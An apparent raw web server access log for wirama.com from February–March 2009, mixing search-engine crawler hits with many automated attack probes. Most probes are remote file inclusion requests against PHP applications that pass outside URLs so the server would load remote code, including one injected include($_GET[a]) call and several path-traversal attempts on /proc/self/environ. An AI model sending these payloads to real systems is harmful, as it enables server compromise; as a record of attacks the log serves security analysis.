91.186.15.66 - - [28/Feb/2009:16:27:40 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.momsbid.com/themes/phpauction_blue/img/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "wirama.com"
65.55.208.60 - - [28/Feb/2009:16:31:49 -0800] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
209.97.199.149 - - [28/Feb/2009:16:35:21 -0800] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kimff.org/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.97.199.149 - - [28/Feb/2009:16:35:21 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kimff.org/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.97.199.149 - - [28/Feb/2009:16:35:21 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kimff.org/FX29ID1.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.186.15.66 - - [28/Feb/2009:16:35:36 -0800] "GET /technote7/errors.php?error=http://www.momsbid.com/themes/phpauction_blue/img/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "wirama.com"
209.97.199.149 - - [28/Feb/2009:16:35:51 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kimff.org/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.97.199.149 - - [28/Feb/2009:16:35:51 -0800] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kimff.org/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.97.199.149 - - [28/Feb/2009:16:35:51 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kimff.org/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
140.174.90.166 - - [28/Feb/2009:16:36:14 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zavolgalan.yaroslavl.ru/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
140.174.90.166 - - [28/Feb/2009:16:36:14 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zavolgalan.yaroslavl.ru/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
66.150.201.199 - - [28/Feb/2009:16:45:38 -0800] "GET /apboard/main.php//_test_holidays.php?APB_rp=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
66.150.201.199 - - [28/Feb/2009:16:45:38 -0800] "GET /logs//apboard/main.php//_test_holidays.php?APB_rp=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
66.150.201.199 - - [28/Feb/2009:17:05:03 -0800] "GET /apboard/main.php//_test_holidays.php?APB_rp=http://gumansin.com/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.150.201.199 - - [28/Feb/2009:17:05:03 -0800] "GET /logs/access.log//apboard/main.php//_test_holidays.php?APB_rp=http://gumansin.com/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.150.201.199 - - [28/Feb/2009:17:05:03 -0800] "GET /logs//apboard/main.php//_test_holidays.php?APB_rp=http://gumansin.com/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.37.66.135 - - [28/Feb/2009:17:51:09 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fpnnews.ca/components/com_simpleboard/ranks/v6id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
64.37.66.135 - - [28/Feb/2009:17:51:12 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fpnnews.ca/components/com_simpleboard/ranks/v6id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
65.55.208.50 - - [28/Feb/2009:18:08:28 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.50 - - [28/Feb/2009:19:52:51 -0800] "GET /_private/?S=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
208.80.194.42 - - [28/Feb/2009:20:31:40 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Creative ZENcast v1.02.11; .NET CLR 2.0.50727)" "www.wirama.com"
219.85.63.226 - - [28/Feb/2009:20:52:27 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
219.85.63.226 - - [28/Feb/2009:20:52:27 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
219.85.63.226 - - [28/Feb/2009:20:52:33 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
219.85.63.226 - - [28/Feb/2009:20:52:34 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
71.109.27.91 - - [28/Feb/2009:20:55:56 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.wirama.com"
71.109.27.91 - - [28/Feb/2009:20:55:57 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "wirama.com"
148.245.102.115 - - [28/Feb/2009:21:41:21 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://c.frey.free.fr/r/editor/idv6.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
148.245.102.115 - - [28/Feb/2009:21:41:21 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://c.frey.free.fr/r/editor/idv6.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.55.208.53 - - [28/Feb/2009:23:01:52 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.53 - - [28/Feb/2009:23:01:52 -0800] "GET /_private/ HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.48 - - [28/Feb/2009:23:02:21 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.48 - - [28/Feb/2009:23:02:22 -0800] "GET /logs/?N=D HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.47 - - [28/Feb/2009:23:02:48 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.47 - - [28/Feb/2009:23:02:48 -0800] "GET /_private/?D=A HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.47 - - [28/Feb/2009:23:20:19 -0800] "GET /logs/?N=A HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
207.226.88.17 - - [28/Feb/2009:23:46:29 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_jce&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
207.226.88.17 - - [28/Feb/2009:23:46:29 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_jce&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
207.226.88.17 - - [28/Feb/2009:23:46:30 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_jce&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.szczepanski.net.pl/my/left.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
207.226.88.17 - - [28/Feb/2009:23:46:30 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_jce&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.szczepanski.net.pl/my/left.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
202.214.193.212 - - [01/Mar/2009:02:35:46 -0800] "GET /errors.php?error=http://www.pau-tennisdetable.fr/yacs/files/icons/bo.do?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
202.214.193.212 - - [01/Mar/2009:02:35:46 -0800] "GET /logs/errors.php?error=http://www.pau-tennisdetable.fr/yacs/files/icons/bo.do?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
209.61.244.6 - - [01/Mar/2009:02:58:11 -0800] "GET /apboard/proarcade.php/add.php?APB_rp=http://www.funnycorner.net/pictures/4880/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.61.244.6 - - [01/Mar/2009:02:58:11 -0800] "GET /logs/access.log//apboard/proarcade.php/add.php?APB_rp=http://www.funnycorner.net/pictures/4880/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.61.244.6 - - [01/Mar/2009:02:58:12 -0800] "GET /logs//apboard/proarcade.php/add.php?APB_rp=http://www.funnycorner.net/pictures/4880/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.61.244.6 - - [01/Mar/2009:02:58:17 -0800] "GET /apboard/proarcade.php/add.php?APB_rp=http://www.funnycorner.net/pictures/4880/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.61.244.6 - - [01/Mar/2009:02:58:17 -0800] "GET /logs/access.log//apboard/proarcade.php/add.php?APB_rp=http://www.funnycorner.net/pictures/4880/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.61.244.6 - - [01/Mar/2009:02:58:18 -0800] "GET /logs//apboard/proarcade.php/add.php?APB_rp=http://www.funnycorner.net/pictures/4880/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.61.244.6 - - [01/Mar/2009:02:58:52 -0800] "GET /logs//apboard/proarcade.php/add.php?APB_rp=http://www.funnycorner.net/pictures/4880/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.61.244.6 - - [01/Mar/2009:02:58:52 -0800] "GET /apboard/proarcade.php/add.php?APB_rp=http://www.funnycorner.net/pictures/4880/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.61.244.6 - - [01/Mar/2009:02:58:53 -0800] "GET /logs/access.log//apboard/proarcade.php/add.php?APB_rp=http://www.funnycorner.net/pictures/4880/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.30.142.221 - - [01/Mar/2009:03:14:21 -0800] "GET /news.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.55.208.60 - - [01/Mar/2009:03:31:51 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.60 - - [01/Mar/2009:03:31:51 -0800] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.60 - - [01/Mar/2009:03:33:57 -0800] "GET /_private/?N=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
69.94.27.169 - - [01/Mar/2009:04:00:24 -0800] "GET /logs//skin_shop/standard/2_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.crosswater-job-guide.com//data/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
69.94.27.169 - - [01/Mar/2009:04:00:24 -0800] "GET /skin_shop/standard/2_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.crosswater-job-guide.com//data/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
213.239.202.227 - - [01/Mar/2009:04:13:50 -0800] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://tronador.ulagos.cl/cursosvirtuales/CARTSIG/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
213.239.202.227 - - [01/Mar/2009:04:13:51 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://tronador.ulagos.cl/cursosvirtuales/CARTSIG/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
58.226.23.55 - - [01/Mar/2009:04:17:33 -0800] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://tronador.ulagos.cl/cursosvirtuales/CARTSIG/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
58.226.23.55 - - [01/Mar/2009:04:17:34 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://tronador.ulagos.cl/cursosvirtuales/CARTSIG/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
65.55.208.48 - - [01/Mar/2009:05:09:28 -0800] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
190.254.58.196 - - [01/Mar/2009:06:12:26 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fpnnews.ca/components/com_simpleboard/ranks/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
190.254.58.196 - - [01/Mar/2009:06:12:26 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fpnnews.ca/components/com_simpleboard/ranks/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
148.245.102.115 - - [01/Mar/2009:06:49:21 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://c.frey.free.fr/r/module/INI/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
148.245.102.115 - - [01/Mar/2009:06:49:21 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://c.frey.free.fr/r/module/INI/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
80.67.24.32 - - [01/Mar/2009:06:53:56 -0800] "GET /logs//includes/errors.php?error=http://dinskaya.ru/stanica/images/list.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
80.67.24.32 - - [01/Mar/2009:06:53:56 -0800] "GET /includes/errors.php?error=http://dinskaya.ru/stanica/images/list.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
72.233.123.50 - - [01/Mar/2009:08:41:55 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.233.123.50 - - [01/Mar/2009:08:41:55 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
190.144.44.36 - - [01/Mar/2009:08:44:11 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
190.144.44.36 - - [01/Mar/2009:08:44:12 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
190.144.44.36 - - [01/Mar/2009:08:44:14 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
190.144.44.36 - - [01/Mar/2009:08:44:14 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
80.93.57.197 - - [01/Mar/2009:08:46:41 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
80.93.57.197 - - [01/Mar/2009:08:46:42 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
80.93.57.197 - - [01/Mar/2009:08:46:47 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
80.93.57.197 - - [01/Mar/2009:08:46:47 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.30.142.221 - - [01/Mar/2009:09:10:41 -0800] "GET /?S=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
38.108.180.106 - - [01/Mar/2009:09:40:55 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "wirama.com"
38.108.180.106 - - [01/Mar/2009:09:40:58 -0800] "GET /?N=A HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "wirama.com"
208.36.144.8 - - [01/Mar/2009:10:21:13 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.wirama.com"
87.229.45.38 - - [01/Mar/2009:10:40:37 -0800] "GET /add.php?APB_rp=http://www.kbmaeil.com/kboard/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "wirama.com"
65.55.208.48 - - [01/Mar/2009:10:52:05 -0800] "GET /_private/?M=A HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.62 - - [01/Mar/2009:11:31:26 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.62 - - [01/Mar/2009:11:31:26 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
72.30.142.221 - - [01/Mar/2009:11:40:23 -0800] "GET /?M=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
64.37.66.135 - - [01/Mar/2009:11:58:44 -0800] "GET /logs////errors.php?error=http://www.blix.cc/language/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
64.37.66.135 - - [01/Mar/2009:11:58:45 -0800] "GET ///errors.php?error=http://www.blix.cc/language/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
85.158.181.25 - - [01/Mar/2009:12:27:21 -0800] "GET /add.php?APB_rp=http://aubrunner.at.server153-han.server-routing.com/apboard/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
85.158.181.25 - - [01/Mar/2009:12:27:21 -0800] "GET /logs//add.php?APB_rp=http://aubrunner.at.server153-han.server-routing.com/apboard/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
202.44.8.40 - - [01/Mar/2009:12:32:37 -0800] "GET /logs/errors.php?error=http://www.nimoa.org/pics/whitepinguin?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "wirama.com"
202.44.8.40 - - [01/Mar/2009:12:32:37 -0800] "GET /errors.php?error=http://www.nimoa.org/pics/whitepinguin?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "wirama.com"
202.44.8.40 - - [01/Mar/2009:12:32:38 -0800] "GET /logs/errors.php?error=http://www.nimoa.org/pics/whitepinguin?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "wirama.com"
202.44.8.40 - - [01/Mar/2009:12:32:38 -0800] "GET /errors.php?error=http://www.nimoa.org/pics/whitepinguin?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "wirama.com"
202.44.8.40 - - [01/Mar/2009:12:32:38 -0800] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
202.44.8.40 - - [01/Mar/2009:12:32:38 -0800] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
202.44.8.40 - - [01/Mar/2009:12:32:39 -0800] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
202.44.8.40 - - [01/Mar/2009:12:32:39 -0800] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
72.30.142.221 - - [01/Mar/2009:12:52:42 -0800] "GET /contents.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
76.13.20.63 - - [01/Mar/2009:13:02:52 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "www.wirama.com"
76.13.20.63 - - [01/Mar/2009:13:02:53 -0800] "GET /images/Best_In_Show.JPG HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "wirama.com"
207.58.138.166 - - [01/Mar/2009:13:08:34 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pau-tennisdetable.fr/yacs/files/icons/bo.do?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
207.58.138.166 - - [01/Mar/2009:13:08:34 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pau-tennisdetable.fr/yacs/files/icons/bo.do?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
65.55.208.51 - - [01/Mar/2009:13:10:20 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.51 - - [01/Mar/2009:13:10:21 -0800] "GET /logs/access.log HTTP/1.1" 200 22065 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
69.65.122.96 - - [01/Mar/2009:13:40:40 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dwsub301.co.kr/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
69.65.122.96 - - [01/Mar/2009:13:40:40 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dwsub301.co.kr/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
72.30.142.221 - - [01/Mar/2009:13:58:46 -0800] "GET /_private/?D=A HTTP/1.0" 200 659 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
63.247.141.39 - - [01/Mar/2009:14:13:32 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://interr1.freehostia.com/v2-id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "wirama.com"
63.247.141.39 - - [01/Mar/2009:14:13:32 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://interr1.freehostia.com/v2-id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "wirama.com"
85.119.154.60 - - [01/Mar/2009:14:23:48 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://abaa.altervista.org/sc.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "wirama.com"
85.119.154.60 - - [01/Mar/2009:14:23:49 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://abaa.altervista.org/sc.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "wirama.com"
91.186.15.66 - - [01/Mar/2009:14:29:47 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.momsbid.com/themes/phpauction_blue/img/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "wirama.com"
91.186.15.66 - - [01/Mar/2009:14:44:28 -0800] "GET /errors.php?error=http://www.momsbid.com/themes/phpauction_blue/img/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "wirama.com"
